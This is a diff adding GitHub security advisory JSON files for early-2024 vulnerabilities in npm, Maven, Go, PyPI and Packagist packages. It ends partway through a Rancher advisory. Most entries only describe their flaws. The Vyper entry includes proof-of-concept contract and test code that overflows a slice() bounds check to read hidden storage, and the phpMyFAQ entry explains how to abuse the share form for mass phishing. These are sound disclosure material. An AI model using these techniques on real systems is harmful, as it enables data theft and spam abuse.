a/advisories/github-reviewed/2024/02/GHSA-9cgf-pxwq-2cpw/GHSA-9cgf-pxwq-2cpw.json b/advisories/github-reviewed/2024/02/GHSA-9cgf-pxwq-2cpw/GHSA-9cgf-pxwq-2cpw.json new file mode 100644 index 0000000000000..6831bd0cf0ece --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9cgf-pxwq-2cpw/GHSA-9cgf-pxwq-2cpw.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9cgf-pxwq-2cpw", + "modified": "2024-02-05T22:33:49Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24397" + ], + "summary": "Stimulsoft Dashboard.JS Cross Site Scripting vulnerability", + "details": "Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "stimulsoft-dashboards-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2024.1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24397" + }, + { + "type": "WEB", + "url": "https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R" + }, + { + "type": "WEB", + "url": "https://cves.at/posts/cve-2024-24397/writeup/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stimulsoft/Dashboards.JS" + }, + { + "type": "WEB", + "url": "http://stimulsoft.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:33:49Z", + "nvd_published_at": "2024-02-05T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9gh8-877r-g477/GHSA-9gh8-877r-g477.json b/advisories/github-reviewed/2024/02/GHSA-9gh8-877r-g477/GHSA-9gh8-877r-g477.json new file mode 100644 index 0000000000000..610d071a2f746 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9gh8-877r-g477/GHSA-9gh8-877r-g477.json @@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gh8-877r-g477", + "modified": "2024-02-06T18:39:23Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22533" + ], + "summary": "Beetl Server-Side Template Injection vulnerability", + "details": "Before Beetl v3.15.13.RELEASE, the rendering template has a server-side template injection (SSTI) vulnerability. When the incoming template is controllable, it will be filtered by the DefaultNativeSecurityManager blacklist. Because blacklist filtering is not strict, the blacklist can be bypassed, leading to arbitrary code execution.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.ibeetl:beetl-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.15.13.RELEASE" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22533" + }, + { + "type": "PACKAGE", + "url": "https://gitee.com/xiandafu/beetl" + }, + { + "type": "WEB", + "url": "https://gitee.com/xiandafu/beetl/issues/I8RU01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:29Z", + "nvd_published_at": "2024-02-02T03:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9gp8-6cg8-7h34/GHSA-9gp8-6cg8-7h34.json b/advisories/github-reviewed/2024/02/GHSA-9gp8-6cg8-7h34/GHSA-9gp8-6cg8-7h34.json new file mode 100644 index 0000000000000..11f34cc0587b2 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9gp8-6cg8-7h34/GHSA-9gp8-6cg8-7h34.json @@ -0,0 +1,134 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gp8-6cg8-7h34", + "modified": "2024-02-06T15:52:33Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-34042" + ], + "summary": "Spring Security's spring-security.xsd file is world writable", + "details": "The spring-security.xsd file inside the spring-security-config jar is world writable which means that if it were extracted it could be written by anyone with access to the file system.\n\nWhile there are no known exploits, this is an example of “CWE-732: Incorrect Permission Assignment for Critical Resource” and could result in an exploit. Users should update to the latest version of Spring Security to mitigate any future exploits found around this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.security:spring-security-config" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.1.1" + }, + { + "fixed": "6.1.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.1.3" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.security:spring-security-config" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.4" + }, + { + "fixed": "6.0.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.6" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.security:spring-security-config" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.8.4" + }, + { + "fixed": "5.8.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.6" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.security:spring-security-config" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.7.9" + }, + { + "fixed": "5.7.11" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.7.10" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34042" + }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-security/commit/5b293d21161e946bf241d9e974b9af93cfafaaac" + }, + { + "type": "PACKAGE", + "url": "https://github.com/spring-projects/spring-security" + }, + { + "type": "WEB", + "url": "https://spring.io/security/cve-2023-34042" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T15:52:33Z", + "nvd_published_at": "2024-02-05T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9hhf-xmcw-r3xg/GHSA-9hhf-xmcw-r3xg.json b/advisories/github-reviewed/2024/02/GHSA-9hhf-xmcw-r3xg/GHSA-9hhf-xmcw-r3xg.json new file mode 100644 index 0000000000000..a1ea48a8349b1 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9hhf-xmcw-r3xg/GHSA-9hhf-xmcw-r3xg.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9hhf-xmcw-r3xg", + "modified": "2024-02-05T23:05:22Z", + "published": "2024-02-05T20:21:25Z", + "aliases": [ + "CVE-2024-22208" + ], + "summary": "phpMyFAQ sharing FAQ functionality can easily be abused for phishing purposes", + "details": "### Summary\nThe 'sharing FAQ' functionality allows any unauthenticated actor to misuse the phpMyFAQ application to send arbitrary emails to a large range of targets.\n\n### Details\nThe phpMyFAQ application has a functionality where anyone can share a FAQ item to others. The front-end of this functionality allows any phpMyFAQ articles to be shared with 5 email addresses. The application will then send these 5 emails. However, there are no controls over what link and content are shared. Furthermore, any unauthenticated actor can perform this action. There is a CAPTCHA in place, however the amount of people you email with a single request is not limited to 5 by the backend. An attacker can thus solve a single CAPTCHA and send thousands of emails at once. \n\n### PoC\nWe send the following form and capture the request.\n![image](https://user-images.githubusercontent.com/44903767/296291204-4a472536-9838-4f9e-bd95-df3d886af43f.png)\n\nWe now change the body to contain 50 email addresses instead of just 1, and send the request. The attacker can also change the body of the email to any phishing message.\n![image](https://user-images.githubusercontent.com/44903767/296291441-bba85a6c-45be-4f07-9385-e6da27713e35.png)\n\nBelow are the logs of the email server, proving that all these emails were sent.\n![image](https://user-images.githubusercontent.com/44903767/296291673-d324be20-74b9-4e16-b25d-aa9b1dd75d5a.png)\n\nAn attacker can also change the link that is sent in these emails. Making phishing even more possible.\n![image](https://user-images.githubusercontent.com/44903767/296291897-8c0a40e7-cd4b-4021-8f4d-4362e10ad36b.png)\n\n### Impact\nAn attacker can utilize the target application's email server to send phishing messages. This can get the server on a blacklist, causing all emails to end up in spam. It can also lead to reputational damages.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phpmyfaq/phpmyfaq" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9hhf-xmcw-r3xg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22208" + }, + { + "type": "WEB", + "url": "https://github.com/thorsten/phpMyFAQ/commit/a34d94ab7b1be9256a9ef898f18ea6bfb63f6f1e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/thorsten/phpMyFAQ" + }, + { + "type": "WEB", + "url": "https://www.phpmyfaq.de/security/advisory-2024-02-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:21:25Z", + "nvd_published_at": "2024-02-05T21:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9m6m-c64r-w4f4/GHSA-9m6m-c64r-w4f4.json b/advisories/github-reviewed/2024/02/GHSA-9m6m-c64r-w4f4/GHSA-9m6m-c64r-w4f4.json new file mode 100644 index 0000000000000..36a98827e6efd --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9m6m-c64r-w4f4/GHSA-9m6m-c64r-w4f4.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9m6m-c64r-w4f4", + "modified": "2024-02-05T22:58:08Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2024-24396" + ], + "summary": "Stimulsoft Dashboard.JS Cross Site Scripting vulnerability", + "details": "Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "stimulsoft-dashboards-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2024.1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24396" + }, + { + "type": "WEB", + "url": "https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R" + }, + { + "type": "WEB", + "url": "https://cves.at/posts/cve-2024-24396/writeup/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stimulsoft/Dashboards.JS" + }, + { + "type": "WEB", + "url": "http://stimulsoft.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:58:08Z", + "nvd_published_at": "2024-02-05T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9vgq-w5pv-v77q/GHSA-9vgq-w5pv-v77q.json b/advisories/github-reviewed/2024/02/GHSA-9vgq-w5pv-v77q/GHSA-9vgq-w5pv-v77q.json new file mode 100644 index 0000000000000..8999b7a5223cc --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9vgq-w5pv-v77q/GHSA-9vgq-w5pv-v77q.json @@ -0,0 +1,118 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9vgq-w5pv-v77q", + "modified": "2024-02-07T21:21:02Z", + "published": "2024-02-07T15:30:50Z", + "aliases": [ + "CVE-2024-25145" + ], + "summary": "Liferay Portal stored cross-site scripting (XSS) vulnerability", + "details": "Stored cross-site scripting (XSS) vulnerability in the Portal Search module's Search Result app in Liferay Portal 7.2.0 through 7.4.3.11, and older unsupported versions, and Liferay DXP 7.4 before update 8, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML into the Search Result app's search result if highlighting is disabled by adding any searchable content (e.g., blog, message board message, web content article) to the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.4.3.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.4.0" + }, + { + "fixed": "7.4.3.13u8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.3.0" + }, + { + "fixed": "7.3.10.u4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.2.10.fp17" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25145" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25145" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T21:21:02Z", + "nvd_published_at": "2024-02-07T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9x7f-gwxq-6f2c/GHSA-9x7f-gwxq-6f2c.json b/advisories/github-reviewed/2024/02/GHSA-9x7f-gwxq-6f2c/GHSA-9x7f-gwxq-6f2c.json new file mode 100644 index 0000000000000..c80abc38ab829 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9x7f-gwxq-6f2c/GHSA-9x7f-gwxq-6f2c.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9x7f-gwxq-6f2c", + "modified": "2024-02-01T20:51:32Z", + "published": "2024-02-01T20:51:32Z", + "aliases": [ + "CVE-2024-24561" + ], + "summary": "Vyper's bounds check on built-in `slice()` function can be overflowed", + "details": "## Summary\n\n[The bounds check for slices](https://github.com/vyperlang/vyper/blob/b01cd686aa567b32498fefd76bd96b0597c6f099/vyper/builtins/functions.py#L404-L457) does not account for the ability for `start + length` to overflow when the values aren't literals. \n\nIf a `slice()` function uses a non-literal argument for the `start` or `length` variable, this creates the ability for an attacker to overflow the bounds check. \n\nThis issue can be used to do OOB access to storage, memory or calldata addresses. It can also be used to corrupt the `length` slot of the respective array.\n\nA contract search was performed and no vulnerable contracts were found in production.\n\ntracking in issue https://github.com/vyperlang/vyper/issues/3756.\n\n## Details\nHere the flow for `storage` is supposed, but it is generalizable also for the other locations.\n\nWhen calling `slice()` on a storage value, there are compile time bounds checks if the `start` and `length` values are literals, but of course this cannot happen if they are passed values:\n\n```python\nif not is_adhoc_slice:\n if length_literal is not None:\n if length_literal < 1:\n raise ArgumentException(\"Length cannot be less than 1\", length_expr)\n\n if length_literal > arg_type.length:\n raise ArgumentException(f\"slice out of bounds for {arg_type}\", length_expr)\n\n if start_literal is not None:\n if start_literal > arg_type.length:\n raise ArgumentException(f\"slice out of bounds for {arg_type}\", start_expr)\n if length_literal is not None and start_literal + length_literal > arg_type.length:\n raise ArgumentException(f\"slice out of bounds for {arg_type}\", node)\n```\n\nAt runtime, we perform the following equivalent check, but the runtime check does not account for overflows:\n```python\n[\"assert\", [\"le\", [\"add\", start, length], src_len]], # bounds check\n```\n\nThe storage `slice()` function copies bytes directly from storage into memory and returns the memory value of the resulting slice. This means that, if a user is able to input the `start` or `length` value, they can force an overflow and access an unrelated storage slot.\n\nIn most cases, this will mean they have the ability to forcibly return `0` for the slice, even if this shouldn't be possible. In extreme cases, it will mean they can return another unrelated value from storage.\n\n## POC: OOB access\n\nFor simplicity, take the following Vyper contract, which takes an argument to determine where in a `Bytes[64]` bytestring should be sliced. It should only accept a value of zero, and should revert in all other cases.\n\n```python\n# @version ^0.3.9\n\nx: public(Bytes[64])\nsecret: uint256\n\n@external\ndef __init__():\n self.x = empty(Bytes[64])\n self.secret = 42\n\n@external\ndef slice_it(start: uint256) -> Bytes[64]:\n return slice(self.x, start, 64)\n```\n\nWe can use the following manual storage to demonstrate the vulnerability:\n```json\n{\"x\": {\"type\": \"bytes32\", \"slot\": 0}, \"secret\": {\"type\": \"uint256\", \"slot\": 3618502788666131106986593281521497120414687020801267626233049500247285301248}}\n```\n\nIf we run the following test, passing `max - 63` as the `start` value, we will overflow the bounds check, but access the storage slot at `1 + (2**256 - 63) / 32`, which is what was set in the above storage layout:\n```solidity\nfunction test__slice_error() public {\n c = SuperContract(deployer.deploy_with_custom_storage(\"src/loose/\", \"slice_error\", \"slice_error_storage\"));\n bytes memory result = c.slice_it(115792089237316195423570985008687907853269984665640564039457584007913129639872); // max - 63\n console.logBytes(result);\n}\n```\n\nThe result is that we return the secret value from storage:\n```\nLogs:\n0x0000...00002a\n```\n## POC: `length` corruption\n`OOG` exception doesn't have to be raised - because of the overflow, only a few bytes can be copied, but the `length` slot is set with the original input value.\n\n```python\nd: public(Bytes[256])\n\t\n@external\ndef test():\n\tx : uint256 = 115792089237316195423570985008687907853269984665640564039457584007913129639935 # 2**256-1\n\tself.d = b\"\\x01\\x02\\x03\\x04\\x05\\x06\"\n\t# s : Bytes[256] = slice(self.d, 1, x)\n\tassert len(slice(self.d, 1, x))==115792089237316195423570985008687907853269984665640564039457584007913129639935\n```\nThe corruption of `length` can be then used to read dirty memory:\n```python\n@external\ndef test():\n x: uint256 = 115792089237316195423570985008687907853269984665640564039457584007913129639935 # 2**256 - 1\n y: uint256 = 22704331223003175573249212746801550559464702875615796870481879217237868556850 # 0x3232323232323232323232323232323232323232323232323232323232323232\n z: uint96 = 1\n if True:\n placeholder : uint256[16] = [y, y, y, y, y, y, y, y, y, y, y, y, y, y, y, y]\n s :String[32] = slice(uint2str(z), 1, x)\t# uint2str(z) == \"1\"\n #print(len(s))\n assert slice(s, 1, 2) == \"22\"\n```\n\n## Impact\n\nThe built-in `slice()` method can be used for OOB accesses or the corruption of the `length` slot.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vyper" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-9x7f-gwxq-6f2c" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24561" + }, + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/issues/3756" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vyperlang/vyper" + }, + { + "type": "WEB", + "url": "https://github.com/vyperlang/vyper/blob/b01cd686aa567b32498fefd76bd96b0597c6f099/vyper/builtins/functions.py#L404-L457" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:51:32Z", + "nvd_published_at": "2024-02-01T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-9xfw-jjq2-7v8h/GHSA-9xfw-jjq2-7v8h.json b/advisories/github-reviewed/2024/02/GHSA-9xfw-jjq2-7v8h/GHSA-9xfw-jjq2-7v8h.json new file mode 100644 index 0000000000000..2a6d872e6e48e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-9xfw-jjq2-7v8h/GHSA-9xfw-jjq2-7v8h.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xfw-jjq2-7v8h", + "modified": "2024-02-05T20:19:30Z", + "published": "2024-02-05T20:19:30Z", + "aliases": [ + "CVE-2024-24768" + ], + "summary": "1Panel set-cookie is missing the Secure keyword", + "details": "### Summary\nThe https cookie that comes with the panel does not have the Secure keyword, which may cause the cookie to be sent in plain text when accessing http accidentally.\n\nhttps://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Set-Cookie#secure\n\n### PoC\nDirectly configure https for the panel, and then capture the packet when logging in again and find that the cookie does not have the Secure keyword\n\n### Impact\nEveryone who has configured the panel https\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/1Panel-dev/1Panel" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.9.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.9.5" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-9xfw-jjq2-7v8h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24768" + }, + { + "type": "WEB", + "url": "https://github.com/1Panel-dev/1Panel/pull/3817" + }, + { + "type": "WEB", + "url": "https://github.com/1Panel-dev/1Panel/commit/1169648162c4b9b48e0b4aa508f9dea4d6bc50d5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/1Panel-dev/1Panel" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-315" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:19:30Z", + "nvd_published_at": "2024-02-05T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json b/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json new file mode 100644 index 0000000000000..1f9030d8e3d37 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json @@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c352-x843-ggpq", + "modified": "2024-02-08T18:42:13Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-24113" + ], + "summary": "XXL-JOB vulnerable to Server-Side Request Forgery", + "details": "xxl-job <= 2.4.0 has a Server-Side Request Forgery (SSRF) vulnerability, which causes low-privileged users to control executor to RCE.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.xuxueli:xxl-job" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24113" + }, + { + "type": "WEB", + "url": "https://github.com/xuxueli/xxl-job/issues/3375" + }, + { + "type": "PACKAGE", + "url": "https://github.com/xuxueli/xxl-job" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:42:13Z", + "nvd_published_at": "2024-02-08T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-c57v-4vg5-cm2x/GHSA-c57v-4vg5-cm2x.json b/advisories/github-reviewed/2024/02/GHSA-c57v-4vg5-cm2x/GHSA-c57v-4vg5-cm2x.json new file mode 100644 index 0000000000000..30d6d2a6202b0 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-c57v-4vg5-cm2x/GHSA-c57v-4vg5-cm2x.json @@ -0,0 +1,123 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c57v-4vg5-cm2x", + "modified": "2024-02-07T18:23:31Z", + "published": "2024-02-07T12:30:25Z", + "aliases": [ + "CVE-2023-51437" + ], + "summary": "Apache Pulsar SASL Authentication Provider observable timing discrepancy vulnerability", + "details": "Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification.\nUsers are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file.\n\nAny component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker.\n\n2.11 Pulsar users should upgrade to at least 2.11.3.\n3.0 Pulsar users should upgrade to at least 3.0.2.\n3.1 Pulsar users should upgrade to at least 3.1.1.\nAny users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions.\n\nFor additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.pulsar:pulsar-broker-auth-sasl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.11.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.pulsar:pulsar-broker-auth-sasl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.0.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.pulsar:pulsar-broker-auth-sasl" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51437" + }, + { + "type": "WEB", + "url": "https://github.com/apache/pulsar/pull/21061" + }, + { + "type": "WEB", + "url": "https://github.com/apache/pulsar/commit/6274fa01a75d74d559bb7e514c970f1fc07d15bc" + }, + { + "type": "WEB", + "url": "https://github.com/apache/pulsar/commit/bc1019fa8ed37b8a4c8bb01e3662c6c015e1bc27" + }, + { + "type": "WEB", + "url": "https://github.com/apache/pulsar/commit/c05954e66ff33098aeb848f4bde51613ace7e47e" + }, + { + "type": "WEB", + "url": "https://github.com/apache/pulsar/commit/c27beca64cc93848c40a374f19eaf4d3cc4f4f03" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/pulsar" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/5kgmvvolf5tzp5rz9xjwfg2ncwvqqgl5" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T18:23:31Z", + "nvd_published_at": "2024-02-07T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-c85r-fwc7-45vc/GHSA-c85r-fwc7-45vc.json b/advisories/github-reviewed/2024/02/GHSA-c85r-fwc7-45vc/GHSA-c85r-fwc7-45vc.json new file mode 100644 index 0000000000000..fde062978514e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-c85r-fwc7-45vc/GHSA-c85r-fwc7-45vc.json @@ -0,0 +1,95 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c85r-fwc7-45vc", + "modified": "2024-02-08T18:43:28Z", + "published": "2024-02-08T18:43:28Z", + "aliases": [ + "CVE-2023-32194" + ], + "summary": "Rancher permissions on 'namespaces' in any API group grants 'edit' permissions on namespaces in 'core'", + "details": "### Impact\nA vulnerability has been identified when granting a `create` or `*` **global role** for a resource type of \"namespaces\"; no matter the API group, the subject will receive `*` permissions for core namespaces. This can lead to someone being capable of accessing, creating, updating, or deleting a namespace in the project. This includes reading or updating a namespace in the project so that it is available in other projects in which the user has the \"manage-namespaces\" permission or updating another namespace in which the user has normal \"update\" permissions to be moved into the project.\n\nThe expected behavior is to not be able to create, update, or delete a namespace in the project or move another namespace into the project since the user doesn't have any permissions on namespaces in the core API group.\n\nMoving a namespace to another project could lead to leakage of secrets, in case the targeted project has secrets. And also can lead to the namespace being able to abuse the resource quotas of the targeted project.\n\n### Patches\nPatched versions include releases `2.6.14`, `2.7.10` and `2.8.2`.\n\n### Workarounds\nThere is no direct mitigation besides updating Rancher to a patched version.\n\n### References\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security 